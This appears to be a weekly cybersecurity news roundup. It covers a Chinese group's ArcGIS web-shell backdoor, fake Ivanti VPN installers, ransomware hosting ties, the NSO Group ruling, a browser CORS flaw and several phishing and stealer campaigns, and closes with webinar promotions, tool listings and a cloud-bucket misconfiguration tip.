Chinese Threat Actors Exploited ArcGIS Server as Backdoor— Threat actors with ties to China have been attributed to a novel campaign that compromised an ArcGIS system and turned it into a backdoor for more than a year. The activity is the handiwork of a Chinese state-sponsored hacking group called Flax Typhoon, which is also tracked as Ethereal Panda and RedJuliett. “The group cleverly modified a geo-mapping application’s Java server object extension (SOE) into a functioning web shell,” ReliaQuest said. “By gating access with a hardcoded key for exclusive control and embedding it in system backups, they achieved deep, long-term persistence that could survive a full system recovery.” The attack chain involved the threat actors targeting a public-facing ArcGIS server that was linked to a private, internal ArcGIS server by compromising a portal administrator account to deploy a malicious SOE, thereby allowing them to blend in with normal traffic and maintain access for extended periods. The attackers then instructed the public-facing server to create a hidden directory to serve as the group’s “private workspace.” They also blocked access to other attackers and admins with a hard-coded key. The findings demonstrate Flax Typhoon’s consistent modus operandi of quietly turning an organization’s own tools against itself rather than using sophisticated malware or exploits.
️🔥 Trending CVEs
Hackers move fast. They often exploit new vulnerabilities within hours, turning a single missed patch into a major breach. One unpatched CVE can be all it takes for a full compromise. Below are this week’s most critical vulnerabilities gaining attention across the industry. Review them, prioritize your fixes, and close the gap before attackers take advantage.
Microsoft Unveils New Security Improvements — Microsoft revealed that “parts of the kernel in Windows 11 have been rewritten in Rust, which helps mitigate against memory corruption vulnerabilities like buffer overflows and helps reduce attack surfaces.” The company also noted that it’s taking steps to secure AI-powered agentic experiences on the operating system by ensuring that they operate with limited permissions and only obtain access to resources users’ explicitly provide permission to. In addition, Microsoft said agents that integrate with Windows must be cryptographically signed by a trusted source so that they can be revoked if found to be malicious. Each AI agent will also run under its own dedicated agent account that’s distinct from the user account on the device. “This facilitates agent-specific policy application that can be different from the rules applied to other accounts like those for human users,” it said.
SEO Campaign Uses Fake Ivanti Installers to Steal Credentials — A new attack campaign has leveraged SEO poisoning to lure users into downloading a malicious version of the Ivanti Pulse Secure VPN client. The activity targets users searching for legitimate software on search engines like Bing, redirecting them to attacker-controlled lookalike websites (ivanti-pulsesecure[.]com or ivanti-secure-access[.]org). The goal of this attack is to steal VPN credentials from the victim’s machine, enabling further compromise. “The malicious installer, a signed MSI file, contains a credential-stealing DLL designed to locate, parse, and exfiltrate VPN connection details,” Zscaler said. “The malware specifically targets the connectionstore.dat file to steal saved VPN server URIs, which it combines with hardcoded credentials for exfiltration. Data is sent to a command-and-control (C2) server hosted on Microsoft Azure infrastructure.”
Qilin’s Ties with BPH Providers Exposed — Cybersecurity researchers from Resecurity examined Qilin ransomware group’s “close affiliation” with underground bulletproof hosting (BPH) operators, finding that the e-crime actor has not only relied on Cat Technologies Co. Limited. (which, in turn, is hosted on an IP address tied to Aeza Group) for hosting its data leak site, but also advertised services like BEARHOST Servers (aka Underground) on its WikiLeaksV2 site, where the group publishes content about their activities. BEARHOST has been operational since 2016, offering its services for anywhere from $95 to $500. While BEARHOST abruptly announced the stoppage of its service on December 28, 2024, it is assessed that the threat actors have taken the BPH service into private mode, catering only to trusted and vetted underground actors. On May 8, 2025, it resurfaced as Voodoo Servers, only for the operators to terminate the service again towards the end of the month, citing political reasons. “The actors decided to disappear through an ‘exit scam’ scenario, keeping the underground audience completely clueless,” Resecurity said. “Notably, the legal entities behind the service continue their operations.” Notably, Cat Technologies Co. Limited. also shares links to shadowy entities like Red Bytes LLC, Hostway, Starcrecium Limited, and Chang Way Technologies Co. Limited, the last of which has been associated with extensive malware activity, hosting command-and-control (C2) servers of Amadey, StealC, and Cobalt Strike used by cybercriminals. Another entity of note is Next Limited, which shares the same Hong Kong address as Chang Way Technologies Co. Limited and has been attributed to malicious activity in connection with Proton66.
U.S. Judge Bars NSO Group from Targeting WhatsApp — A U.S. judge barred NSO Group from targeting WhatsApp users and cut the punitive damages verdict awarded to Meta by a jury in May 2025 to $4 million, because the court did not have enough evidence to determine that NSO Group’s behavior was “particularly egregious.” The permanent injunction handed out by U.S. District Judge Phyllis Hamilton means that the Israeli vendor cannot use WhatsApp as a way to infect targets’ devices. As a refresher, Meta sued the NSO Group in 2019 over the use of Pegasus spyware by exploiting a then-zero-day flaw in the messaging app to spy on 1,400 people from 20 countries, including journalists and human rights activists. It was fined close to $168 million earlier this May. The proposed injunction requires NSO Group to delete and destroy computer code related to Meta’s platforms, and she concluded that the provision is “necessary to prevent future violations, especially given the undetectable nature of defendants’ technology.”
Google’s Privacy Sandbox Initiative is Officially Dead — In 2019, Google launched an initiative called Privacy Sandbox to come up with privacy-enhancing alternatives to replace third-party cookies on the web. However, with the company abandoning its plans to deprecate third-party tracking cookies, the project appears to be winding down. To that end, the tech giant said it’s retiring the following Privacy Sandbox technologies citing low levels of adoption: Attribution Reporting API (Chrome and Android), IP Protection, On-Device Personalization, Private Aggregation (including Shared Storage), Protected Audience (Chrome and Android), Protected App Signals, Related Website Sets (including requestStorageAccessFor and Related Website Partition), SelectURL, SDK Runtime and Topics (Chrome and Android). In a statement shared with Adweek, the company said it will continue to work to improve privacy across Chrome, Android, and the web, but not under the Privacy Sandbox branding.
Russia Blocks Foreign SIM Cards — Russia said it’s taking steps to temporarily block mobile internet for foreign SIM cards, citing national security reasons. The new rule imposes a mandatory 24-hour mobile internet blackout for anyone entering Russia with a foreign SIM card.
Flaw in CORS headers in Web Browsers Disclosed — The CERT Coordination Center (CERT/CC) disclosed details of a vulnerability in cross-origin resource sharing (CORS) headers in Chromium, Google Chrome, Microsoft Edge, Safari, and Firefox that enables the CORS policy to be manipulated. This can be combined with DNS rebinding techniques to issue arbitrary requests to services listening on arbitrary ports, regardless of the CORS policy in place by the target. “An attacker can use a malicious site to execute a JavaScript payload that periodically sends CORS headers in order to ask the server if the cross-origin request is safe and allowed,” CERT/CC explained. “Naturally, the attacker-controlled hostname will respond with permissive CORS headers that will circumvent the CORS policy. The attacker then performs a DNS rebinding attack so that the hostname is assigned the IP address of the target service. After the DNS responds with the changed IP address, the new target inherits the relaxed CORS policy, allowing an attacker to potentially exfiltrate data from the target.” Mozilla is tracking the vulnerability as CVE-2025-8036.
Phishing Campaigns Use Microsoft’s Logo for Tech Support Scams — Threat actors are exploiting Microsoft’s Name and branding in phishing emails to lure users into fraudulent tech support scams. The messages contain links that, when clicked, take the victims to a fake CAPTCHA challenge, after which they are redirected to a phishing landing page to unleash the next stage of the attack. “After passing the captcha verification, the victim is suddenly visually overloaded with several pop-ups that appear to be Microsoft security alerts,” Cofense said. “Their browser is manipulated to appear locked, and they lose the ability to locate or control their mouse, which adds to the feeling that the system is compromised. This involuntary loss of control creates a faux ransomware experience, leading the user to believe their computer is locked and to take immediate action to remedy the infection.” From there, users are instructed to call a number to reach Windows Support, at which they are connected to a bogus technician to take the attack forward. “The threat actor could exploit further by asking the user to provide account credentials or persuade the user to install remote desktop tools, allowing full access to their system,” the company said.
Taxpayers, Drivers Targeted in Refund and Road Toll Smishing Scams — A smishing campaign has leveraged at least 850 newly-registered domain names in September and early October to target people living in the U.S., the U.K., and elsewhere with phishing links that use tax refunds, road toll charges, or failed package deliveries as a lure. The websites, designed to be loaded only when launched from a mobile device, claim to provide information about their tax refund status or obtain a subsidy of up to £300 to help offset winter fuel costs (note: this is a real U.K. government initiative), only to prompt them to provide personal details such as name, home address, telephone number and email address, as well as payment card information. The entered data is exfiltrated to the attackers over the WebSocket protocol. Some of the scam websites have also been found to target Canadian, German, and Spanish residents and visitors, per Netcraft.
Meta’s New Collage Feature May Use Photos in Phone’s Camera Roll — Meta is officially rolling out a new opt-in feature to Facebook users in the U.S. and Canada to suggest the best photos and videos from users’ camera roll and create collages and edits. “With your permission and the help of AI, our new feature enables Facebook to automatically surface hidden gems – those memorable moments that get lost among screenshots, receipts, and random snaps – and edit them to save or share,” the company said. The feature was first tested back in late June 2025. The social media company emphasized that the suggestions are private and that it does not use media obtained from users’ devices via the camera roll to train its models, unless users opt to edit the media with their AI tools or publish those suggestions to Facebook. Users who wish to opt out of the feature can do so by navigating Settings and Privacy > Settings > Preferences > Camera Roll Sharing Suggestions.
Fake Homebrew, TradingView, LogMeIn Sites Serve Stealer Malware Targeting Macs — Threat actors are employing social engineering tactics to trick users into visiting fake websites impersonating trusted platforms like as Homebrew, TradingView, and LogMeIn, where they are instructed to copy and run a malicious command on the Terminal app as part of ClickFix-style attacks, resulting in the deployment of stealer malware such as Atomic Stealer and Odyssey Stealer. “More than 85 phishing domains were identified, connected through shared SSL certificates, payload servers, and reused infrastructure,” Hunt.io said. “The findings suggest a coordinated and ongoing campaign in which operators continuously adapt their infrastructure and tactics to maintain persistence and evade detection within the macOS ecosystem.” It’s suspected that users are driven to these websites via sponsored ads on search engines like Bing and Google.
Dutch Data Protection Watchdog Fines Experian $3.2 Million for Privacy Violations — The Dutch Data Protection Authority (DPA) imposed a fine of €2.7 million ($3.2 million) on Experian Netherlands for collecting data in contravention of the E.U. General Data Protection Regulation (GDPR). The DPA said the consumer credit reporting company gathered information on people from both public and non-public sources and failed to make it clear why the collection of certain data was necessary. In addition to the penalty, Experian is expected to delete the database of personal data by the end of the year. The company has also ceased its operations in the country. “Until January 1, 2025, Experian provided credit assessments about individuals to its clients,” the DPA said. “To do this, the company collected data such as negative payment behavior, outstanding debts, or bankruptcies. The AP found that Experian violated the law by unlawfully using personal data.”
Threat Actors Send Fake Password Manager Breach Alerts — Bad actors are sending phishing alerts claiming that their password manager accounts for 1Password and Lastpass have been compromised in order to trick users into providing their passwords and hijack their accounts. In response to the attack, LastPass said it has not been hacked and that it’s an attempt on the part of the attackers to generate a false sense of urgency. In some cases spotted by Bleeping Computer, the activity has also been found to urge recipients to install a more secure version of the password manager, resulting in the deployment of a legitimate remote access software called Syncro. The software vendor has since moved to shut down the malicious accounts to prevent further installs.
SocGholish MaaS Detailed — LevelBlue has published an analysis of a threat activity cluster known as SocGholish (aka FakeUpdates), which is known to be active since 2017, leveraging fake web browser update prompts on compromised websites as a lure to distribute malware. Victims are typically routed through Traffic Distribution Systems (TDS) like Keitaro and Parrot TDS to filter users based on specific factors such as geography, browser type, or system configuration, ensuring that only the intended targets are exposed to the payload. It’s offered under a malware-as-a-service (MaaS) by a financially motivated cybercrime group called TA569. SocGholish stands out for its ability to turn legitimate websites into large-scale distribution platforms for malware. Acting as an initial access broker (IAB), its operations profit from follow-on compromises by other actors. “Once executed, its payloads range from loaders and stealers to ransomware, allowing for extensive follow-up exploitation,” LevelBlue said. “This combination of broad reach, simple delivery mechanisms, and flexible use by multiple groups makes SocGholish a persistent and dangerous threat across industries and regions.” One of its primary users is Evil Corp, with the malware also used to deliver RansomHub in early 2025.
🎥 Cybersecurity Webinars
The Practical Framework to Govern AI Agents Without Slowing Innovation → AI is changing everything fast — but for most security teams, it still feels like a fight just to keep up. The goal isn’t to slow innovation with more controls; it’s to make those controls work for the business. By building security into AI from the start, you can turn what used to be a bottleneck into a real accelerator for growth and trust.
The Future of AI in GRC: Turning Risk Into a Compliance Advantage – AI is changing how companies manage risk and compliance — fast. It brings big opportunities but also new challenges. This webinar shows you how to use AI safely and effectively in GRC, avoid common mistakes, and turn complex rules into a real business advantage.
Workflow Clarity: How to Blend AI and Human Effort for Real Results – Too many teams are rushing to “add AI” without a plan — and ending up with messy, unreliable workflows. Join us to learn a clearer approach: how to use AI thoughtfully, simplify automation, and build systems that scale securely.
🔧 Cybersecurity Tools
Beelzebub – It turns honeypot deployment into a powerful, low-code experience. It uses AI to simulate real systems, helping security teams detect attacks, track emerging threats, and share insights through a global threat intelligence network.
NetworkHound – It maps your Active Directory network from the inside out. It discovers every device — domain-joined or shadow-IT — validates SMB and web services, and builds a full BloodHound-compatible graph so you can see and secure your environment clearly.
Disclaimer: These tools are for educational and research use only. They haven’t been fully security-tested and could pose risks if used incorrectly. Review the code before trying them, test only in safe environments, and follow all ethical, legal, and organizational rules.
🔒 Tip of the Week
Most Cloud Breaches Aren’t Hacks — They’re Misconfigurations. Here’s How to Fix Them — Cloud storage buckets like AWS S3, Azure Blob, and Google Cloud Storage make data sharing easy — but one wrong setting can expose everything. Most data leaks happen not because of hacking, but because someone left a public bucket, skipped encryption, or used a test bucket that never got locked down. Cloud platforms give you flexibility, not guaranteed safety, so you need to check and control access yourself.
Misconfigurations usually happen when permissions are too broad, encryption is disabled, or visibility is lost across multiple clouds. Doing manual checks doesn’t scale — especially if you manage data in AWS, Azure, and GCP. The fix is using tools that automatically find, report, and even fix unsafe settings before they cause damage.
ScoutSuite is a strong starting point for cross-cloud visibility. It scans AWS, Azure, and GCP for open buckets, weak IAM roles, and missing encryption, then creates an easy-to-read HTML report. **Prowler** goes deeper into AWS, checking S3 settings against CIS and AWS benchmarks to catch bad ACLs or unencrypted buckets.
For ongoing control, Cloud Custodian lets you write simple policies that automatically enforce rules — for example, forcing all new buckets to use encryption. And CloudQuery can turn your cloud setup into a searchable database, so you can monitor changes, track compliance, and visualize risks in one place.
The best approach is to combine them: run ScoutSuite or Prowler weekly to find issues, and let Cloud Custodian handle automatic fixes. Even a few hours spent setting these up can stop the kind of data leaks that make headlines. Always assume every bucket is public until proven otherwise — and secure it like it is.
Conclusion
The truth is, no tool or patch will ever make us fully secure. What matters most is awareness — knowing what’s normal, what’s changing, and how attackers think. Every alert, log, or minor anomaly is a clue. Keep connecting those dots before someone else does.
